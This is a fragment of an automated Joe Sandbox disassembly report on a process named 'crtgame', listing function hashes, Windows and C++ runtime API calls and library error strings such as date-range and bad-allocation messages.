• Opcode ID: c6075614deed7425577e6e4decf7b831104598842fb36945b07c132c553f32b7
• Instruction ID: e7ad76c64c0f0fd59e284539c72ec6b7c328d16b0dd182f54686ffc418bd0227
• Opcode Fuzzy Hash: c6075614deed7425577e6e4decf7b831104598842fb36945b07c132c553f32b7
• Instruction Fuzzy Hash: 7121AD71E002089BDF04EFE8D450AEEBFB5EF54704F2444DEE90AAB241DB705A04CB91
APIs
• _malloc.LIBCMT ref: 02BC5288
  • Part of subcall function 02BD29AC: __FF_MSGBANNER.LIBCMT ref: 02BD29C3
  • Part of subcall function 02BD29AC: __NMSG_WRITE.LIBCMT ref: 02BD29CA
  • Part of subcall function 02BD29AC: RtlAllocateHeap.NTDLL(00830000,00000000,00000001), ref: 02BD29EF
• SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000,00002000,00000000,00000001,00000000,00000000,?,02BC75B2), ref: 02BC529A
Strings
Memory Dump Source
• Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
Yara matches
Similarity
• API ID: AllocateFolderHeapPathSpecial_malloc
• String ID: \save.dat
• API String ID: 4128168839-3580179773
• Opcode ID: c2341c80e4fa4f4a1902170bf02966ec31b6c99fce38ed9ab4b6024b772415f4
                                                                          • Instruction ID: 11f7afdab5a252b24362d3f52e79b6cf7d5066a1bc2b4d197447392888030999
                                                                          • Opcode Fuzzy Hash: c2341c80e4fa4f4a1902170bf02966ec31b6c99fce38ed9ab4b6024b772415f4
                                                                          • Instruction Fuzzy Hash: 041190329042016BDB359E658C80EAFFFABDFC265072401FCE8856B206D7A32D02C7E1
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC396A
                                                                          • std::runtime_error::runtime_error.LIBCPMT ref: 02BC39C1
                                                                            • Part of subcall function 02BC1410: std::exception::exception.LIBCMT ref: 02BC1428
                                                                            • Part of subcall function 02BC9FA7: __EH_prolog.LIBCMT ref: 02BC9FAC
                                                                            • Part of subcall function 02BC9FA7: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02BC9FBB
                                                                            • Part of subcall function 02BC9FA7: __CxxThrowException@8.LIBCMT ref: 02BC9FDA
                                                                          Strings
                                                                          • Day of month is not valid for year, xrefs: 02BC39AC
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                                          • String ID: Day of month is not valid for year
                                                                          • API String ID: 1404951899-1521898139
                                                                          • Opcode ID: 1b220dacf9a442a0cc0ab21fb72d7e2b9df5c61dafc1a6dceefbdf204fe0b4e6
                                                                          • Instruction ID: 317e943556ecc81768ef5bc1fae124a464621664860303c9de3144e66c905495
                                                                          • Opcode Fuzzy Hash: 1b220dacf9a442a0cc0ab21fb72d7e2b9df5c61dafc1a6dceefbdf204fe0b4e6
                                                                          • Instruction Fuzzy Hash: DF01B176910209AEDF04EFA4D801AEEB779FF18710F50409EFC05A3210EB708A45CB95
                                                                          APIs
                                                                          • std::exception::exception.LIBCMT ref: 02BCF510
                                                                          • __CxxThrowException@8.LIBCMT ref: 02BCF525
                                                                            • Part of subcall function 02BD354C: _malloc.LIBCMT ref: 02BD3564
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                          • String ID: bad allocation
                                                                          • API String ID: 4063778783-2104205924
                                                                          • Opcode ID: a196cfdbb2ee219d5c1af8babf1a096556d833534d733b103b9be2fcacaf4849
                                                                          • Instruction ID: 23f38ee7bbbd0f49840572ec5df68296013f846ca1b38d583585dfa1e9e827ca
                                                                          • Opcode Fuzzy Hash: a196cfdbb2ee219d5c1af8babf1a096556d833534d733b103b9be2fcacaf4849
                                                                          • Instruction Fuzzy Hash: BFF0277160030EA7DF08AAACC9119FF73ECDB00700B6005EAF426D21C2FB70E6008981
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC3C1B
                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 02BC3C30
                                                                            • Part of subcall function 02BD1EB7: std::exception::exception.LIBCMT ref: 02BD1EC1
                                                                            • Part of subcall function 02BC9FE0: __EH_prolog.LIBCMT ref: 02BC9FE5
                                                                            • Part of subcall function 02BC9FE0: __CxxThrowException@8.LIBCMT ref: 02BCA00E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                          • String ID: bad cast
                                                                          • API String ID: 1300498068-3145022300
                                                                          • Opcode ID: 01e139fab208735ed3c482902f32088f9df9cf84626a16f20a9a0f9fb0bf9ddb
                                                                          • Instruction ID: 610e38f9491203020da95eb5e1e192a0e6ff260bdedf8a611885f7a0b1c611f3
                                                                          • Opcode Fuzzy Hash: 01e139fab208735ed3c482902f32088f9df9cf84626a16f20a9a0f9fb0bf9ddb
                                                                          • Instruction Fuzzy Hash: FEF0A0729005088BCB19DF58D440AEEB775EF52315F1041EEED0A5B251DBB29A46DBD0
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC3886
                                                                          • std::runtime_error::runtime_error.LIBCPMT ref: 02BC38A5
                                                                            • Part of subcall function 02BC1410: std::exception::exception.LIBCMT ref: 02BC1428
                                                                          Strings
                                                                          • Day of month value is out of range 1..31, xrefs: 02BC3894
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prologstd::exception::exceptionstd::runtime_error::runtime_error
                                                                          • String ID: Day of month value is out of range 1..31
                                                                          • API String ID: 2067857976-1361117730
                                                                          • Opcode ID: b11be5ce59feabdedf8539d1497f5a4c4f26262a4c05a40d09a32e00d9625ac5
                                                                          • Instruction ID: 00fbaa0677e52de0e6c78006f9eb9cf6221b8002aa00ca52755a38a3916927a4
                                                                          • Opcode Fuzzy Hash: b11be5ce59feabdedf8539d1497f5a4c4f26262a4c05a40d09a32e00d9625ac5
                                                                          • Instruction Fuzzy Hash: 37E09272A0010497DB24AB9888117DDB7B9DB08710F1444DEE80273280DBB119449B91
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC38D2
                                                                          • std::runtime_error::runtime_error.LIBCPMT ref: 02BC38F1
                                                                            • Part of subcall function 02BC1410: std::exception::exception.LIBCMT ref: 02BC1428
                                                                          Strings
                                                                          • Year is out of valid range: 1400..10000, xrefs: 02BC38E0
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prologstd::exception::exceptionstd::runtime_error::runtime_error
                                                                          • String ID: Year is out of valid range: 1400..10000
                                                                          • API String ID: 2067857976-2344417016
                                                                          • Opcode ID: a5ab4cbe12df570b14d0de107a26904c1deed9f9ca03fea7d3830d8a932ae2e1
                                                                          • Instruction ID: 18e473955a110fc8369164e4a60e52641058710cd275a662bd69e572a16074c5
                                                                          • Opcode Fuzzy Hash: a5ab4cbe12df570b14d0de107a26904c1deed9f9ca03fea7d3830d8a932ae2e1
                                                                          • Instruction Fuzzy Hash: 28E0D872B0010497DF24FB98C8117DDB7BADB08710F1440DEE80267280DFB11944CF91
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC391E
                                                                          • std::runtime_error::runtime_error.LIBCPMT ref: 02BC393D
                                                                            • Part of subcall function 02BC1410: std::exception::exception.LIBCMT ref: 02BC1428
                                                                          Strings
                                                                          • Month number is out of range 1..12, xrefs: 02BC392C
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prologstd::exception::exceptionstd::runtime_error::runtime_error
                                                                          • String ID: Month number is out of range 1..12
                                                                          • API String ID: 2067857976-4198407886
                                                                          • Opcode ID: a6ac227c7d81b17df03ee369769bcc9ded8232db56fc18916fe4002cfa54e6af
                                                                          • Instruction ID: 77626b16424fa49ba82ed73a326971060e0e8ba97d3404a3f89c96ef8a5d88ba
                                                                          • Opcode Fuzzy Hash: a6ac227c7d81b17df03ee369769bcc9ded8232db56fc18916fe4002cfa54e6af
                                                                          • Instruction Fuzzy Hash: B5E0D872B4011497DB24FB98C8117DDB7BADB08710F1441DEE80263280DFB15944CF91
                                                                          APIs
                                                                          • TlsAlloc.KERNEL32 ref: 02BC19CC
                                                                          • GetLastError.KERNEL32 ref: 02BC19D9
                                                                            • Part of subcall function 02BC1712: __EH_prolog.LIBCMT ref: 02BC1717
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocErrorH_prologLast
                                                                          • String ID: tss
                                                                          • API String ID: 249634027-1638339373
                                                                          • Opcode ID: c0c6057fe4737b0a859ba8ef7337bf6704c98b953d9a6fcca1885bdd56ea118b
                                                                          • Instruction ID: 14be3c7eb4623ddb6006fee91d0b5057958e6b196ee7eab9e8e92284adccf775
                                                                          • Opcode Fuzzy Hash: c0c6057fe4737b0a859ba8ef7337bf6704c98b953d9a6fcca1885bdd56ea118b
                                                                          • Instruction Fuzzy Hash: 15E08632D142145BC6007B7C980808AFBA49B44274F204BAAEDADD73D1FF3089559BC7
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC3BD8
                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 02BC3BED
                                                                            • Part of subcall function 02BD1EB7: std::exception::exception.LIBCMT ref: 02BD1EC1
                                                                            • Part of subcall function 02BC9FE0: __EH_prolog.LIBCMT ref: 02BC9FE5
                                                                            • Part of subcall function 02BC9FE0: __CxxThrowException@8.LIBCMT ref: 02BCA00E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                          • String ID: bad cast
                                                                          • API String ID: 1300498068-3145022300
                                                                          • Opcode ID: 58c3a8534363d138ac353b72ba65cf3700f49a15c2b93d845205cdea55c0e55a
                                                                          • Instruction ID: 934fee4f855054b5d71368c85fd99eaa57f00eb03e2d0318128398670c171e87
                                                                          • Opcode Fuzzy Hash: 58c3a8534363d138ac353b72ba65cf3700f49a15c2b93d845205cdea55c0e55a
                                                                          • Instruction Fuzzy Hash: 89E0D6B1A00108DBCB28EF68D101BBCBBB1EF24308F1080ECA80A4B290DB311A06CF81